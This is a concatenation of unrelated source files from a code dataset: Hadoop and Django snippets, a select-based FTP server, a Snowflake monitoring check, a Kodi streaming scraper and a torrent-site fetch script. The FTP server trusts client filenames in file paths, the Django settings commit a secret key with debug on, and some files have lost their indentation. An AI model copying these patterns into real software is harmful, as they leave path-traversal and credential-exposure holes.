489389020069f65eb4be1020ec10e8c44a59df25 | d88d7dfc8bf80b170babee6c70105ff0a1a05e18 | /lesson_4/combine_datasets_reducer.py | 83304e8dbdab3dc4df295aff7f194d3e716f5ef4 | [] | no_license | robertowm/udacity-hadoop | 0bbd706b523af29cb9767bdedd8293298c7cb69f | 44f4edfc988be863e80a5c1bfbacec341c393ada | refs/heads/master | 2020-05-19T23:10:22.825242 | 2014-09-27T01:10:01 | 2014-09-27T01:10:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 930 | py | #!/usr/bin/python
# Here you will be able to combine the values that come from 2 sources
# Value that starts with A will be the user data
# Values that start with B will be forum node data
import sys
import csv
def reducer():
    """Join pre-sorted user ("A") and forum-node ("B") rows arriving on stdin.

    The stream is assumed sorted so each user row precedes that user's node
    rows; every node authored by the most recently seen user is written out
    joined with that user's reputation/badge fields.
    """
    current_user = None
    reputation = gold = silver = bronze = None
    rows_in = csv.reader(sys.stdin, delimiter='\t')
    rows_out = csv.writer(sys.stdout, delimiter='\t', quotechar='"', quoting=csv.QUOTE_ALL)
    for row in rows_in:
        if row[1] == "A":
            # User record: remember its fields for the node rows that follow.
            current_user, _tag, reputation, gold, silver, bronze = row
        elif current_user is not None:
            (author_id, _tag, node_id, title, tagnames, node_type,
             parent_id, abs_parent_id, added_at, score) = row
            if current_user == author_id:
                rows_out.writerow([node_id, title, tagnames, author_id, node_type,
                                   parent_id, abs_parent_id, added_at, score,
                                   reputation, gold, silver, bronze])

reducer()
"robertowm@gmail.com"
] | robertowm@gmail.com |
cf6b5c3cf8eab870142880ad20aef61977195e4d | 290a42cc6db9d6ec778b20afbd730f6fd463b8ad | /CS1/Labs/Lab 3/quicksort.py | 3a3b63a03d3ff264f275ab6d86de0568933046cf | [] | no_license | sdberthoud/linkedin | ceed63dd4e54ed0438e87f5c53dd8b03ae23c429 | 85279363a61b82c58fe011569dc220fb857bd2e5 | refs/heads/master | 2021-07-10T11:27:07.539040 | 2017-10-12T02:53:42 | 2017-10-12T02:53:42 | 106,635,433 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,996 | py | '''
filename: quicksort.py
name: shane berthoud
date: november 4th 2014
course: cs 1
purpose: to write the sort function and all of the other functions that come with it.'''
from string import lower
def partition(the_list, p, r, compare_func):
    """Lomuto partition of the_list[p..r] around the pivot the_list[r].

    Elements for which compare_func(elem, pivot) is true end up left of the
    returned pivot index; everything else ends up to its right. Returns the
    pivot's final index.
    """
    pivot = the_list[r]
    boundary = p - 1  # last index of the "passes compare_func" region
    for scan in range(p, r):
        if compare_func(the_list[scan], pivot):
            boundary += 1
            the_list[boundary], the_list[scan] = the_list[scan], the_list[boundary]
    # Drop the pivot immediately after the compare-true region.
    the_list[boundary + 1], the_list[r] = the_list[r], the_list[boundary + 1]
    return boundary + 1
def swap(the_list, i, j):
    """Swap the items at indices i and j of the_list in place."""
    # Tuple assignment is the idiomatic Python swap; no temporary needed.
    the_list[i], the_list[j] = the_list[j], the_list[i]
# Comparison predicates handed to sort/quicksort/partition; each answers
# "should city1 sort before (or level with) city2?".
def compare_population(city1, city2):
    """Strict > yields a descending sort by population."""
    return city1.pop > city2.pop

def compare_name(city1, city2):
    """Case-insensitive ascending sort by city name.

    Uses str.lower() instead of string.lower(); the string-module function
    was removed in Python 3 (the module-level `from string import lower`
    import above is therefore unused/obsolete).
    """
    return city1.name.lower() <= city2.name.lower()

def compare_latitude(city1, city2):
    """Ascending sort by latitude."""
    return city1.lat <= city2.lat
def quicksort(the_list, p, r, compare_func):
    """Recursively quicksort the_list[p..r] in place under compare_func's ordering."""
    if p >= r:
        return  # zero or one element: already sorted
    split = partition(the_list, p, r, compare_func)
    quicksort(the_list, p, split - 1, compare_func)
    quicksort(the_list, split + 1, r, compare_func)
def sort(the_list, compare_func):
    """Sort the whole list in place by delegating to quicksort over [0, len-1]."""
    quicksort(the_list, 0, len(the_list) - 1, compare_func)
| [
"noreply@github.com"
] | sdberthoud.noreply@github.com |
3428c594603a90805fd8a98ac2b11e759393237a | 54da96e9295035b894bbd6c4bea36357127c5c90 | /ftp-server/core/main.py | 8edcb4c0748738fda0771c0387b98d7c607a739b | [] | no_license | suxiangjun/select-ftpserver | 7adbe47d78cb584b7067de0e4dbc1484ec7dd5dc | ddf95b2b978909f73b04be96c0191c39c8e84ff8 | refs/heads/master | 2021-05-07T13:57:50.384156 | 2017-11-16T09:50:08 | 2017-11-16T09:50:08 | 109,794,904 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,345 | py | #!/usr/bin/env python
#-*- coding:utf-8 -*-
__author = "susu"
import selectors, socket,json,shelve,os,sys,time,hashlib,logging
import queue
basedir=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
user_basedir=basedir+'/home/'
sys.path.append(basedir)
conn_dic={} #用于存放每个连接上传/下载的文件信息
class My_select(object):
"""Single-threaded selectors-based FTP-style server.

One DefaultSelector drives accept() for the listening socket and read() for
each client; per-connection upload/download scratch state lives in the
module-level conn_dic.
"""
user_now_dir="/"
def __init__(self):
self.sel=selectors.DefaultSelector()
self.d=queue.Queue()
def accept(self,sock,mask):
"Accept a new client connection and register its read() callback."
self.conn, self.addr = sock.accept()
# Temporary per-connection storage for uploaded / downloaded file data.
conn_dic[self.conn]=[{"filesize": 0,"file": queue.Queue(),"uploads":0},{"filesize": queue.Queue(), "file": queue.Queue()}]
self.conn.setblocking(False)
self.sel.register( self.conn, selectors.EVENT_READ, self.read) # register read() for the new connection
def read(self,conn,mask):
"Handle client data: upload bytes, a JSON command, or a control word."
client_data =self.conn.recv(1024) # eg: '{"action": "get", "filename": "filename", "overridden": true}'
if conn_dic[self.conn][0]["uploads"]: # upload mode active: this payload is file content from a put
q = queue.Queue()
# fetch this connection's put (upload) state
put_dic = conn_dic[self.conn][0]
if os.path.isfile(put_dic["file_dir"] + put_dic["filename"]):
f = open(put_dic["file_dir"] + put_dic["filename"] + ".new", "wb")
else:
f = open(put_dic["file_dir"] + put_dic["filename"], "wb")
received_size = len(client_data)
print(received_size)
f.write(client_data)
while received_size < put_dic["filesize"]:
data = self.conn.recv(1024)
f.write(data)
received_size += len(data)
else:
# NOTE(review): while/else — this branch runs once the receive loop
# finishes; blocking recv() inside a selector callback stalls other clients.
f.close()
conn_dic[self.conn][0]["uploads"] = 0 # leave upload mode
info = "file [%s] has uploaded..." % put_dic["filename"]
self.conn.send(info.encode())
self.log("成功上传{}文件".format(put_dic["filename"]))
else:
if client_data:
if client_data.decode().startswith("{"):
# JSON command: dispatch to the method named by "action" (ls/put/get).
cmd_dic = json.loads(client_data.decode())
action = cmd_dic["action"]
if hasattr(self,action):
func = getattr(self,action)
func(cmd_dic)
elif client_data.decode().startswith("receive"):
# Client is ready: push the queued download payload.
self.conn.sendall(conn_dic[self.conn][1]["file"].get())
elif client_data.decode().startswith("uploads"):
conn_dic[self.conn][0]["uploads"]=1 # enter upload mode
self.conn.send(b"ack")
else:
# Empty recv => peer closed; unregister and close the socket.
print("closing",conn)
self.sel.unregister(conn)
conn.close()
# list files
def ls(self, *args):
'''List the entries of the user's current home directory.'''
cmd_dic = args[0]
user_dir = user_basedir + self.user_now_dir
filenames = os.listdir(user_dir)
# data[0] = directories, data[1] = regular files
data = [[], []]
for i in filenames:
if os.path.isfile(user_dir + "/" + i):
data[1].append(i)
else:
data[0].append(i)
self.conn.send(str(data).encode())
# upload file
def put(self,*args):
'''Record the incoming file's name/size and acknowledge the upload request.'''
cmd_dic = args[0]
conn_dic[self.conn][0]["filename"]=cmd_dic["filename"]
conn_dic[self.conn][0]["filesize"]=cmd_dic["size"]
conn_dic[self.conn][0]["file_dir"]=user_basedir+self.user_now_dir+"/"
self.conn.send(b"200 ok")
# download file
def get(self,*args):
# Queue the requested file's bytes and send its size ("n" when missing).
cmd_dic = args[0]
get_dic=conn_dic[self.conn][1]
filename = cmd_dic["filename"]
user_dir=user_basedir+self.user_now_dir+"/"
print("{0}下载文件:".format(self.addr[0]))
self.log("{}下载{}文件".format(self.addr[0], filename))
if os.path.isfile(user_dir + filename):
with open(user_dir+filename, "rb") as f:
file_size = os.stat(user_dir+filename).st_size
conn_dic[self.conn][1]["filesize"]=file_size
conn_dic[self.conn][1]["file"].put(f.read())
self.conn.send(str(file_size).encode())
else:
self.conn.send("n".encode())
# logging helper
@staticmethod
def log(info):
# Appends one timestamped line to <basedir>/log/ftp.log.
logging.basicConfig(filename=basedir + "/log/" + "ftp.log",
level=logging.INFO,
format='%(asctime)s %(message)s',
datefmt='%m/%d/%Y %H:%M:%S %p')
logging.info(info)
def run(self):
# Bind localhost:9999 and drive the selector event loop forever.
server = socket.socket()
server.bind(('localhost', 9999))
server.listen(500)
server.setblocking(False)
self.sel.register(server, selectors.EVENT_READ, self.accept) # every new connection triggers accept()
while True:
events = self.sel.select()
print("事件:",events)
for key, mask in events:
callback = key.data
callback(key.fileobj, mask)
f=My_select() # module-level instance; caller is expected to invoke f.run()
| [
"986109409@qq.com"
] | 986109409@qq.com |
66bb9aeae5ab3dde0c9d500676672ff6edc506f4 | 80ab3312d7bbe514d1e7b3452fdd9c25d542f079 | /oops/overriding.py | 3b411b7f2fef66fc30a35faf8d9f4ec6f97ef139 | [] | no_license | krishnanandk/kkprojects | 2e7e993475b10696b05873a15df997ddf46931a1 | dd5d96ad7af9f8632648e833fcae87951ca431de | refs/heads/master | 2023-04-09T04:08:23.077215 | 2021-04-19T04:56:11 | 2021-04-19T04:56:11 | 359,332,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | class Books:
def count(self):
print("10000 thousand books")
def authorname(self):
print("MT Vasudevan Nair")
class Novel(Books):
def authorname(self):
print("Vaikkom Muhammed Basheer")
obj=Novel()
obj.authorname() | [
"krishnanandk264@gmail.com"
] | krishnanandk264@gmail.com |
4c4a1bf67de7fa2a59a078835fd7716c06180b88 | f6bdf02ba4c3fbfe7f4b697b23ee57e71d4157ab | /unpipelined.py | 27145430552455ac5c9dc7407d1a9d94b469e80d | [] | no_license | jaya2991/Nios2InstructionSetArchitecture | a51600f402bb0a8bec92997c2d151a35017ded86 | 310e7f95e9f8be8dbe26bea09dc745c26d43f39b | refs/heads/master | 2021-01-12T14:46:29.836079 | 2016-10-27T08:38:44 | 2016-10-27T08:38:44 | 72,085,405 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,052 | py | #! /usr/bin/python
import sys
from stages import *
from registers import *
from memory import *
def main():
# Drive the unpipelined Nios II simulator: each instruction runs all five
# stages (fetch/decode/execute/memory/write-back) to completion before the
# next begins, dumping the register file after every instruction.
# NOTE(review): .iteritems() is Python 2 only — this module will not run on Python 3.
i = 0
j = 0
while (i < 5):
instruction = Stages_40.instr_fetch_40()
Stages_40.decode_instr_40(instruction)
Stages_40.execute_40(instruction)
Stages_40.memory_access_40(instruction)
Stages_40.write_back_40(instruction)
for (a, b) in Registers_40.nios_registers_40.iteritems():
print (a,b)
i = i + 1
while (j < 32):
instruction = Stages_40.instr_fetch_40()
Stages_40.decode_instr_40(instruction)
Stages_40.execute_40(instruction)
Stages_40.memory_access_40(instruction)
Stages_40.write_back_40(instruction)
for (a, b) in Registers_40.nios_registers_40.iteritems():
print (a,b)
j = j + 1
# One final instruction after the two loops (5 + 32 + 1 total).
instruction = Stages_40.instr_fetch_40()
Stages_40.decode_instr_40(instruction)
Stages_40.execute_40(instruction)
Stages_40.memory_access_40(instruction)
Stages_40.write_back_40(instruction)
for (a, b) in Registers_40.nios_registers_40.iteritems():
print (a,b)
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | jaya2991.noreply@github.com |
191c990010ee96e42377d1326870b184f985478c | adce23a96e95337e81b062fccbcd8c77729bfd7e | /snowflake/datadog_checks/snowflake/check.py | 49e0204ef67e881eda954fd2f5952813946b461c | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] | permissive | therc/integrations-core | fa17ff539ba65b1e27c63717dd64598cbb13e218 | a849833bf919f12e1cac384603a6611c97f93538 | refs/heads/master | 2021-06-25T03:50:41.402313 | 2021-02-08T14:53:07 | 2021-02-08T14:53:07 | 202,616,355 | 0 | 0 | BSD-3-Clause | 2019-08-15T21:53:49 | 2019-08-15T21:53:49 | null | UTF-8 | Python | false | false | 6,032 | py | # (C) Datadog, Inc. 2020-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
from contextlib import closing
import snowflake.connector as sf
from datadog_checks.base import AgentCheck, ConfigurationError
from datadog_checks.base.utils.db import QueryManager
from . import queries
from .config import Config
# Maps each user-facing `metric_groups` config value to the query classes that
# collect it; unknown keys are reported in SnowflakeCheck.__init__.
METRIC_GROUPS = {
'snowflake.query': [queries.WarehouseLoad, queries.QueryHistory],
'snowflake.billing': [queries.CreditUsage, queries.WarehouseCreditUsage],
'snowflake.storage': [queries.StorageUsageMetrics],
'snowflake.storage.database': [queries.DatabaseStorageMetrics],
'snowflake.storage.table': [queries.TableStorage],
'snowflake.logins': [queries.LoginMetrics],
'snowflake.data_transfer': [queries.DataTransferHistory],
'snowflake.auto_recluster': [queries.AutoReclusterHistory],
'snowflake.pipe': [queries.PipeHistory],
'snowflake.replication': [queries.ReplicationUsage],
}
class SnowflakeCheck(AgentCheck):
"""
Collect Snowflake account usage metrics
"""
__NAMESPACE__ = 'snowflake'
SERVICE_CHECK_CONNECT = 'snowflake.can_connect'
def __init__(self, *args, **kwargs):
super(SnowflakeCheck, self).__init__(*args, **kwargs)
self.config = Config(self.instance)
self._conn = None
# Proxy settings come from init_config (shared across instances), not the instance.
self.proxy_host = self.init_config.get('proxy_host', None)
self.proxy_port = self.init_config.get('proxy_port', None)
self.proxy_user = self.init_config.get('proxy_user', None)
self.proxy_password = self.init_config.get('proxy_password', None)
# Add default tags like account to all metrics
self._tags = self.config.tags + ['account:{}'.format(self.config.account)]
if self.config.password:
self.register_secret(self.config.password)
if self.config.role == 'ACCOUNTADMIN':
self.log.info(
'Snowflake `role` is set as `ACCOUNTADMIN` which should be used cautiously, '
'refer to docs about custom roles.'
)
# Resolve configured metric_groups to query classes; collect unknown names
# so they can all be reported in a single warning.
self.metric_queries = []
self.errors = []
for mgroup in self.config.metric_groups:
try:
self.metric_queries.extend(METRIC_GROUPS[mgroup])
except KeyError:
self.errors.append(mgroup)
if self.errors:
self.log.warning('Invalid metric_groups found in snowflake conf.yaml: %s', (', '.join(self.errors)))
if not self.metric_queries:
raise ConfigurationError('No valid metric_groups configured, please list at least one.')
self._query_manager = QueryManager(self, self.execute_query_raw, queries=self.metric_queries, tags=self._tags)
self.check_initializations.append(self._query_manager.compile_queries)
def check(self, _):
# Connect, run all configured queries, report version, then close.
self.connect()
if self._conn is not None:
# Execute queries
self._query_manager.execute()
self._collect_version()
self.log.debug("Closing connection to Snowflake...")
self._conn.close()
def execute_query_raw(self, query):
"""
Executes query with timestamp from parts if comparing start_time field.
Returns all rows, or [] when the cursor reports no results.
"""
with closing(self._conn.cursor()) as cursor:
cursor.execute(query)
if cursor.rowcount is None or cursor.rowcount < 1:
self.log.debug("Failed to fetch records from query: `%s`", query)
return []
return cursor.fetchall()
def connect(self):
# Open a Snowflake connection from config; on failure emit a CRITICAL
# service check and leave self._conn as None (check() then does nothing).
self.log.debug(
"Establishing a new connection to Snowflake: account=%s, user=%s, database=%s, schema=%s, warehouse=%s, "
"role=%s, timeout=%s, authenticator=%s, ocsp_response_cache_filename=%s, proxy_host=%s, proxy_port=%s",
self.config.account,
self.config.user,
self.config.database,
self.config.schema,
self.config.warehouse,
self.config.role,
self.config.login_timeout,
self.config.authenticator,
self.config.ocsp_response_cache_filename,
self.proxy_host,
self.proxy_port,
)
try:
conn = sf.connect(
user=self.config.user,
password=self.config.password,
account=self.config.account,
database=self.config.database,
schema=self.config.schema,
warehouse=self.config.warehouse,
role=self.config.role,
passcode_in_password=self.config.passcode_in_password,
passcode=self.config.passcode,
client_prefetch_threads=self.config.client_prefetch_threads,
login_timeout=self.config.login_timeout,
ocsp_response_cache_filename=self.config.ocsp_response_cache_filename,
authenticator=self.config.authenticator,
token=self.config.token,
client_session_keep_alive=self.config.client_keep_alive,
proxy_host=self.proxy_host,
proxy_port=self.proxy_port,
proxy_user=self.proxy_user,
proxy_password=self.proxy_password,
)
except Exception as e:
msg = "Unable to connect to Snowflake: {}".format(e)
self.service_check(self.SERVICE_CHECK_CONNECT, self.CRITICAL, message=msg, tags=self._tags)
self.warning(msg)
else:
self.service_check(self.SERVICE_CHECK_CONNECT, self.OK, tags=self._tags)
self._conn = conn
@AgentCheck.metadata_entrypoint
def _collect_version(self):
# Best-effort: version failures are logged, never raised.
try:
raw_version = self.execute_query_raw("select current_version();")
version = raw_version[0][0]
except Exception as e:
self.log.error("Error collecting version for Snowflake: %s", e)
else:
if version:
self.set_metadata('version', version)
| [
"noreply@github.com"
] | therc.noreply@github.com |
dfe3d4a0d7a8e21bbbff025739f9b9b914cf880e | fc93b3817f1fb8bb6c5a37884790741d34ba1707 | /testdriver.py | 9dd79f9a4c96d89f09e00ec30e3423174d94ee16 | [] | no_license | GrahamOMalley/spiderBro | 107fb2d03a87a8a02607aad8cd8bb51befd6ab44 | 53379cc41128a714e30551fe946f587ad60e72c8 | refs/heads/master | 2020-04-26T02:53:40.981210 | 2015-05-11T10:19:33 | 2015-05-11T10:19:33 | 1,685,002 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,805 | py | #! /usr/bin/env python
#from sb_utils import *
import sys
import urllib2
if __name__ == "__main__":
"""
quick little testing script to see behaviour of search classes and test individual episodes/seasons
"""
# NOTE(review): Python 2 script (urllib2, print statement); most search-class
# experiments below are kept commented out for reference.
# e_masks = [NxN, sNeN, NNN]
# s_masks = [season, series]
# search_list = [piratebaysearch, btjunkiesearch, isohuntsearch]
# tags = ["SWESUB", "SPANISH"]
# opts = {"use_debug_logging":True, "log_dir":"log"}
#log = get_sb_log(opts)
#base = base_search()
#base.search("Game of Thrones", "1", "3", sNeN, tags, True)
#p = piratebaysearch()
#result = p.search("Girls", "2", "2", sNeN, tags, True)
#if result: log.info("\t\tFound Torrent: %s" % result)
#i = isohuntsearch()
#result = i.search("The Office (US)", "8", "17", sNeN, tags, False)
#print e.search_url
#if result: log.info("\t\tFound Torrent: %s" % result)
#e = extratorrentsearch()
#result = e.search("The Office (US)", "8", "17", sNeN, tags, False)
#print e.search_url #if result: log.info("\t\tFound Torrent: %s" % result)
#proxy_support = urllib2.ProxyHandler({})
#opener = urllib2.build_opener(proxy_support)
#urllib2.install_opener(opener)
#response = urllib2.urlopen("http://extratorrent.cc/search/?search=downton+abbey&new=1&x=0&y=0")
# Live test: fetch a kickass search page with browser-like headers and dump the HTML.
request = urllib2.Request("https://kickass.unblocked.pw/usearch/marvels%20agents%20of%20S.H.I.E.L.D.%20s02e10/")
request.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')
request.add_header('User-Agent', "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0")
request.add_header('Accept-Language', "en-US,en;q=0.5")
response = urllib2.urlopen(request)
search_page = response.read()
print search_page
| [
"gomgomgom@gmail.com"
] | gomgomgom@gmail.com |
dc4f3f96ee63e46f710ab8d879f75b8de8298493 | 0912b90163930701f17c7cca214ffce2ad30c702 | /CRUD/urls.py | 2742d34b236d169aca2baab3c5c21b5cae04c3d4 | [] | no_license | Miskat-UL/django_model_CRUD | 967a8bb385ee4c77f59a02818b8cd4e355884e61 | 0babad284897d5dde1cf763c157fea42b1e5da69 | refs/heads/main | 2023-08-16T07:55:12.439289 | 2021-09-23T04:50:03 | 2021-09-23T04:50:03 | 409,300,389 | 4 | 1 | null | 2021-09-29T15:46:34 | 2021-09-22T17:42:09 | Python | UTF-8 | Python | false | false | 1,102 | py | """CRUD URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from main import views as main_views
from teachers import views as teacher_views
urlpatterns = [
path('admin/', admin.site.urls),
# Student CRUD (main app): listing, edit form, and create/update/delete actions.
path('students/', main_views.home),
path('students/<str:edit>/<str:qs>', main_views.another),
path('<str:action>/<str:id>', main_views.action_handler),
# Teacher CRUD (teachers app).
path('teachers/', teacher_views.home),
path('teachers/<str:edit>/<str:qs>', teacher_views.another),
]
| [
"77013640+Miskat-UL@users.noreply.github.com"
] | 77013640+Miskat-UL@users.noreply.github.com |
379cfcb0a6591eec89be0d795db705d0ab5fd90d | b830f3d2b94aa3be76bfe6c7a8e72c37dc6dc316 | /nd_project_1_Q3.py | c695f1c4503bbff630a2b52a9d9fdf4a82c617c2 | [] | no_license | burnssa/nd_project_1 | 71f412843aee9899d6c914c506f507b09cb7beb5 | 012cabb863c680edef05d47caa95a63781b127ac | refs/heads/master | 2021-01-01T20:48:02.940610 | 2015-07-18T16:34:22 | 2015-07-18T16:34:22 | 38,554,880 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,763 | py |
import numpy as np
import pandas as pd
import ggplot
from ggplot import *
from pandas import *
import scipy.stats
import string
PATH_TO_CSV = "turnstile_weather_v2.csv"
def run_hourly_entry_chart(csv_path):
# Plot intra-day hourly entries for the 10 busiest NYC subway units in the CSV.
# NOTE(review): Python 2 script; pandas .sort() and .convert_objects() are
# long-deprecated APIs and would need .sort_values()/to_numeric on modern pandas.
turnstile_data = pd.read_csv(csv_path)
#Create table melted with hourly entries as values on index of 'hour'
turnstile_data['hour_float'] = turnstile_data['hour'].astype(float)
turnstile_data['UNIT_float'] = turnstile_data['UNIT'].str.replace('R','').astype(float)
turnstile_data['entries_float'] = turnstile_data['ENTRIESn'].str.replace(',','').convert_objects(convert_numeric=True)
#Get an array of top 10 units of ENTRIESn
turnstile_data_unit = turnstile_data.groupby(['UNIT_float']).sum()
turnstile_data_sorted = turnstile_data_unit.sort(['entries_float'], ascending=[0]).reset_index()
top_10_units = turnstile_data_sorted['UNIT_float'].head(10)
print top_10_units
top_turnstile_data = turnstile_data[turnstile_data['UNIT_float'].isin(top_10_units)]
# top 10 UNITs by total entries
print top_turnstile_data
#put data on top 10 stations in a pivot table with columns indexed on hourly entries
hourly_table_df = pd.pivot_table(top_turnstile_data,index=['hour_float'], columns=['UNIT_float'], values=['ENTRIESn_hourly'],aggfunc=np.sum).reset_index(0)
hourly_graph = pd.melt(hourly_table_df, id_vars=['hour_float'])
print hourly_graph
#print graph
p = ggplot(hourly_graph, aes(x ='hour_float', y ='value', color='UNIT_float')) +\
geom_point(alpha = 0.9, size=40) +\
stat_smooth(colour='red', span=.6) +\
xlab("Hour of Day") +\
ylab("Hourly Entries for Preceding Four Hours") +\
ggtitle("Intra-day Entries at NYC's 10 Largest Subway Units") +\
xlim(0,20) +\
ylim(0,800000)
print p
run_hourly_entry_chart(PATH_TO_CSV)
| [
"scott@guidefinancial.com"
] | scott@guidefinancial.com |
44fdb2a4b0c790599b0870be6e31e8c7a7f83422 | a3ca523c6d2373f8db13be87ef7890d94409aa29 | /plugin.video.salts/scrapers/clickplay_scraper.py | d83d47505e549bbe80abdd5b797e844b1012679a | [] | no_license | kodicustomfx/install | 57d3c52103d723da1e003ce2f5a6fd188202f4d5 | 828383bf6b4933d3c2cd86d07e954e0d932ec400 | refs/heads/master | 2021-01-10T08:31:34.120840 | 2015-11-15T23:21:40 | 2015-11-15T23:21:40 | 46,240,544 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,484 | py | """
SALTS XBMC Addon
Copyright (C) 2014 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import scraper
import re
import urlparse
import xbmcaddon
import urllib
import base64
from salts_lib import dom_parser
from salts_lib.constants import VIDEO_TYPES
from salts_lib.constants import QUALITIES
BASE_URL = 'http://clickplay.to'
class ClickPlay_Scraper(scraper.Scraper):
    """SALTS scraper plugin for clickplay.to.

    Supports TV shows, seasons and episodes; sources are scraped from
    <video>/<source> tags (direct streams) and embedded iframes (hosted
    streams).
    """
    base_url = BASE_URL
    def __init__(self, timeout=scraper.DEFAULT_TIMEOUT):
        # Allow the user to override the site root via the addon setting
        # named '<scraper name>-base_url'.
        self.timeout = timeout
        self.base_url = xbmcaddon.Addon().getSetting('%s-base_url' % (self.get_name()))
    @classmethod
    def provides(cls):
        """Video types this scraper can handle."""
        return frozenset([VIDEO_TYPES.TVSHOW, VIDEO_TYPES.SEASON, VIDEO_TYPES.EPISODE])
    @classmethod
    def get_name(cls):
        """Display/settings name of this scraper."""
        return 'clickplay.to'
    def resolve_link(self, link):
        # Links are already resolvable; no extra resolution step needed.
        return link
    def format_source_label(self, item):
        """Label shown in the source-selection dialog: '[quality] host'."""
        label = '[%s] %s ' % (item['quality'], item['host'])
        return label
    def get_sources(self, video):
        """Scrape the episode page for stream sources.

        Returns a list of hoster dicts; direct <source> streams are marked
        direct=True (with gvideo quality detection), iframes are indirect.
        """
        source_url = self.get_url(video)
        hosters = []
        if source_url:
            url = urlparse.urljoin(self.base_url, source_url)
            html = self._http_get(url, cache_limit=.5)
            # Direct stream embedded in a <video><source src=...> tag.
            ele = dom_parser.parse_dom(html, 'video')
            if ele:
                stream_url = dom_parser.parse_dom(ele, 'source', ret='src')
                if stream_url:
                    hoster = {'multi-part': False, 'url': stream_url[0], 'class': self, 'quality': QUALITIES.HD720, 'host': self._get_direct_hostname(stream_url[0]), 'rating': None, 'views': None, 'direct': True}
                    if hoster['host'] == 'gvideo':
                        hoster['quality'] = self._gv_get_quality(hoster['url'])
                    hosters.append(hoster)
            # Hosted streams embedded as iframes (facebook widgets skipped).
            sources = dom_parser.parse_dom(html, 'iframe', ret='src')
            for src in sources:
                if 'facebook' in src: continue
                host = urlparse.urlparse(src).hostname
                hoster = {'multi-part': False, 'url': src, 'class': self, 'quality': QUALITIES.HIGH, 'host': host, 'rating': None, 'views': None, 'direct': False}
                hosters.append(hoster)
        return hosters
    def get_url(self, video):
        """Delegate to the base class's cached URL lookup."""
        return super(ClickPlay_Scraper, self)._default_get_url(video)
    def _get_episode_url(self, show_url, video):
        """Build the season page URL and match the episode link on it."""
        season_url = show_url + 'season-%d/' % (int(video.season))
        episode_pattern = 'href="([^"]+/season-%d/episode-%d-[^"]+)' % (int(video.season), int(video.episode))
        title_pattern = 'href="([^"]+)"\s+title="[^"]+/\s*([^"]+)'
        return super(ClickPlay_Scraper, self)._default_get_episode_url(season_url, video, episode_pattern, title_pattern)
    def search(self, video_type, title, year):
        """Search the site's A-Z list for shows matching *title*/*year*.

        Matching is done on normalized titles; year matches when either side
        omits it or both agree.
        """
        url = urlparse.urljoin(self.base_url, '/tv-series-a-z-list')
        html = self._http_get(url, cache_limit=8)
        results = []
        pattern = '<li>\s*<a.*?href="([^"]+)[^>]*>([^<]+)'
        norm_title = self._normalize_title(title)
        for match in re.finditer(pattern, html, re.DOTALL):
            url, match_title_year = match.groups()
            # Titles may carry a trailing '(YYYY)' year suffix.
            r = re.search('(.*?)\s+\((\d{4})\)', match_title_year)
            if r:
                match_title, match_year = r.groups()
            else:
                match_title = match_title_year
                match_year = ''
            if norm_title in self._normalize_title(match_title) and (not year or not match_year or year == match_year):
                result = {'url': url.replace(self.base_url, ''), 'title': match_title, 'year': match_year}
                results.append(result)
        return results
    def _http_get(self, url, data=None, cache_limit=8):
        """Fetch *url* through the base class's caching HTTP helper."""
        return super(ClickPlay_Scraper, self)._cached_http_get(url, self.base_url, self.timeout, data=data, cache_limit=cache_limit)
| [
"jasonhogan11@yahoo.com"
] | jasonhogan11@yahoo.com |
0ff3565d487e9b1d1204420dc25fe29bc312d388 | cd317b0e4790a510f0829ca4f9bea6abe11fa621 | /learning_log/settings.py | ccb13d3896fef40f65159d65125e66e17fe716fc | [] | no_license | apracapinheiro/learning_log | 8f011c05bbdfc4355e28ee7194e42e01e36e8192 | 0a3fa5292290574fe456900e065c707a65b811f8 | refs/heads/master | 2020-12-24T08:39:46.562684 | 2016-11-08T20:36:46 | 2016-11-08T20:36:46 | 73,075,842 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,046 | py | # -*- coding: utf-8 -*-
"""
Django settings for learning_log project.
Generated by 'django-admin startproject' using Django 1.10.3.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
# Project root (two levels above this settings module).
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to the repo; rotate it and load from
# the environment before any real deployment.
SECRET_KEY = '=09u_t_+(+mvh^b5mju706l-x743hgrnv61gkihzt)e_w#^0r9'
# SECURITY WARNING: don't run with debug turned on in production!
# (Overridden to False in the Heroku branch at the bottom of this file.)
DEBUG = True
